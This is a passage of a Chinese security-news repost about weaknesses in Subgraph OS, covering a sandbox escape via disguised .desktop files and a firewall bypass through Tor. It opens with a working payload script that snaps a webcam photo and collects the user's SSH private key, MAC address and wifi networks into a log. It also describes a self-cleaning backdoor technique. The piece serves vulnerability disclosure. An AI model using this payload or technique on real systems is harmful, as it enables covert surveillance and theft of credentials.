欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

Subgraph操作系统绝非你想象的那么安全

来源:本站整理 作者:佚名 时间:2019-01-10 TAG: 我要投稿
cd $HOME/.config/tools;
torify apt download fswebcam;
dpkg-deb -xv `ls fswebcam_*.deb` .;
./usr/bin/fswebcam -r 640x480 $HOME/webcam-snapshot.jpg;
# Download an image to the home directory
torify wget /Article/UploadPic/2019-1/201911021919991.jpg -O $HOME/attacker-can-drop-files-from-the-internet.jpg;
# Log the ifconfig output, which includes the MAC address
echo "ifconfig output:" >> $HOME/pwnlog.txt;
/sbin/ifconfig >> $HOME/pwnlog.txt;
echo >> $HOME/pwnlog.txt;
# Log information about the current Tor exit node
echo "tor exit node info:" >> $HOME/pwnlog.txt;
torify curl https://ifconfig.co/json >> $HOME/pwnlog.txt;
echo >> $HOME/pwnlog.txt;
echo >> $HOME/pwnlog.txt;
# Log SSH public and secret key
echo "ssh public and secret keys:" >> $HOME/pwnlog.txt;
cat $HOME/.ssh/id_rsa.pub >> $HOME/pwnlog.txt;
echo >> $HOME/pwnlog.txt;
cat $HOME/.ssh/id_rsa >> $HOME/pwnlog.txt;
echo >> $HOME/pwnlog.txt;
# Log scan of nearby wifi networks
echo "nearby wifi:" >> $HOME/pwnlog.txt;
/sbin/iwlist $INTERFACE scan >> $HOME/pwnlog.txt;
echo >> $HOME/pwnlog.txt;
# Log list of saved wifi networks
echo "saved wifi networks:" >> $HOME/pwnlog.txt;
ls /etc/NetworkManager/system-connections >> $HOME/pwnlog.txt;
echo >> $HOME/pwnlog.txt;
使用.desktop文件攻击沙盒
当我们在Subgraph操作系统中打开PDF时,.desktop文件会打开一个Evince OZ沙盒,只能访问该文档。但是,一些沙盒可以让.desktop文件对整个文件夹进行写入访问。例如,Tor浏览器沙盒可以读写 ~/Downloads/TorBrowser,而LibreOffice沙盒可以读写~/Documents/LibreOffice。
也就是说,如果.desktop文件可以通过使用Tor浏览器或LibreOffice漏洞利用这些沙盒来实现沙盒远程执行代码,那么也就可以通过修改这些目录中的文件来升级特权获取未分配的远程代码执行。
例如,.desktop文件会伪装成正常Word文档,诱骗用户下载恶意程序,并在Nautilus中打开它。 Subgraph操作系统将打开一个LibreOffice OZ沙盒,并让它访问该文档,比如 ~/Downloads/TorBrowser/resume.docx。
恶意的resume.docx的有效内容可能会将draft-proposal.odt重命名为其他文件,例如也许将会将其改为.DS_Store之类隐藏文件,然后创建一个新的文件draft-proposal.odt.desktop并使其成为可执行文件。接着,当用户双击Nautilus中的draft-proposal.odt文件时(~/Documents/LibreOffice/draft-proposal.odt都是合法的文件),攻击者就会从沙盒中逃逸出去。因为有效载荷可以在自身安装完成之后进行自我清理,在安装后门程序之后移动.DS_Store恢复到draft-proprosal.odt并删除draft-proposal.odt.desktop。
绕过Subgraph防火墙
Subgraph防火墙的防护效果非常好,它是一个应用程序防火墙,允许用户逐个批准或拒绝网络连接。正如我们在上文中所讲的,当我们打开GNOME Calculator应用程序时,它尝试进行网络连接,但是Subgraph防火墙会拦截这些连接,并允许我们拒绝它们的访问。
但是,由于Subgraph防火墙允许所有Tor流量通过,例如,如果我们打开一个终端并运行curl example.com,防火墙将拦截此连接,并提供拒绝该连接的选项。

但是如果你运行torify curl example.com,它就会正常运行。如果我们检查上面的有效载荷,就将看到我们使用的所有互联网请求都绕过了防火墙。
当我们把这个问题报告给Subgraph的开发者时,他们表示Subgraph防火墙不是为了防止恶意软件进行网络连接,而只是为了防止意外的隐私泄露,例如使用计算器时。所以他们不认为这是一个非常特别的安全问题。
我们可以在当他们的官网上看到对Subgraph防火墙的介绍,他们忽略了这个问题:

但是,它们在“Subgraph操作系统手册”中提到,但也只是模棱两可的表示了一下。
应用程序防火墙对于监控来自应用程序的额外连接非常有用,例如,一些应用程序可能会在供应商的网站上返回,这种活动通常是合法的(非恶意的),但它仍然可能违反用户的隐私或者软件运行的正常逻辑,而Subgraph 防火墙就为用户提供了允许或拒绝这些连接的选择。
另外,恶意代码也可能会回到由黑客或恶意代码开发者操控的网站或服务器。Subgraph防火墙还可以提醒用户这些连接,以便用户可以把这些链接拒绝掉。
应用防火墙无法防止所有恶意代码连接到互联网,复杂的恶意代码可以修改合法的网络连接以绕过防火墙。但是,防火墙可能会检测到这些恶意代码的篡改行为,从而提醒用户是否进行连接尝试。
Subgraph的开发者表示,他们将来可能会扩大防火墙的范围,其中就包括允许Subgraph防火墙拦截Tor流量,以便让让用户拒绝它。
Subgraph上的漏洞是如何影响到Qubes的?
Qubes是灵活的,所以攻击成功多少取决于用户的选择。
当然,如果你不想如此深入地探究安装的Linux,可以改而选择一种关注安全的发行版。
如果你的系统至少有8GB内存,那么Qubes 操作系统可能是合适的发行版。Qubes 操作系统

上一页  [1] [2] [3] [4]  下一页

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载